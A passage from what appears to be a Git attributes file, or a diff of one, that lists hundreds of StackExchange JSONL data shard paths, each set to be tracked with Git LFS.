filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2253_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2254_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2255_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2256_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2257_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2258_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2259_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/225_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2260_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2261_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2262_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2263_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2264_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2265_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2266_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2267_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2268_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2269_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/226_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2270_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2271_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2272_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2273_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2274_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2275_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2276_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2277_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2278_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2279_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/227_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2280_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2281_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2282_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2283_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2284_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2285_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2286_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2287_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2288_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/228_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/229_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/22_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/230_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/231_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/232_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/233_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/234_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/235_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/236_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/237_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/238_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/239_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/23_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/240_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/241_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/242_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/243_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/244_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/245_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/246_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/247_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/248_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/249_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/24_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/250_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/251_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/252_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/253_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/254_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/255_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/256_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/257_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/258_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/259_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/25_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/260_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/261_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/262_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/263_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/264_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/265_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/266_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/267_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/268_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/269_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/26_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/270_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/271_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/272_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/273_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/274_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/275_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/276_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/277_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/278_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/279_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/27_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/280_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/281_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/282_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/283_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/284_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/285_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/286_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/287_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/288_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/289_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/28_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/290_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/291_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/292_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/293_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/294_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/295_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/296_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/297_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/298_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/299_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/29_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/300_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/301_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/302_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/303_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/304_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/305_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/306_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/307_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/308_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/309_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/30_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/310_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/311_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/312_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/313_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/314_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/315_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/316_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/317_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/318_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/319_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/31_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/320_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/321_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/322_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/323_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/324_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/325_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/326_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/327_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/328_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/329_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/32_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/330_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/331_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/332_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/333_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/334_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/335_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/336_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/337_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/338_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/339_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/33_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/340_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/341_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/342_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/343_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/344_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/345_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/346_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/347_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/348_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/349_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/34_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/350_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/351_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/352_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/353_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/354_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/355_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/356_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/357_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/358_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/359_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/35_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/360_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/361_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/362_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/363_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/364_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/365_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/366_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/367_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/368_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/369_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/36_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/370_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/371_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/372_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/373_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/374_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/375_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/376_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/377_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/378_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/379_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/37_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/380_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/381_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/382_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/383_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/384_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/385_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/386_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/387_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/388_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/389_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/38_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/390_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/391_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/392_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/393_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/394_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/395_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/396_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/397_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/398_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/399_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/39_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/3_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/400_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/401_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/402_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/403_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/404_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/405_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/406_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/407_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/408_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/409_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/40_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/410_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/411_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/412_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/413_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/414_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/415_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/416_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/417_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/418_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/419_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/41_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/420_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/421_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/422_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/423_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/424_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/425_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/426_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/427_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/428_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/429_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/42_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/430_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/431_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/432_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/433_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/434_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/435_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/436_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/437_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/438_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/439_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/43_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/440_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/441_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/442_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/443_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/444_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/445_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/446_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/447_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/448_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/449_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/44_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/450_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/451_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/452_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/453_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/454_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/455_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/456_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/457_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/458_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/459_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/45_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/460_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/461_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/462_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/463_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/464_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/465_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/466_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/467_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/468_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/469_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/46_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/470_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/471_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/472_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/473_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/474_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/475_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/476_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/477_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/478_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/479_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/47_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/480_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/481_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/482_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/483_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/484_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/485_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/486_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/487_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/488_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/489_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/48_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/490_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/491_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/492_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/493_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/494_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/495_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/496_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/497_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/498_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/499_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/49_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/4_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/500_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/501_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/502_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/503_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/504_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/505_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/506_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/507_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/508_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/509_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/50_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/510_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/511_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/512_2289.jsonl filter=lfs 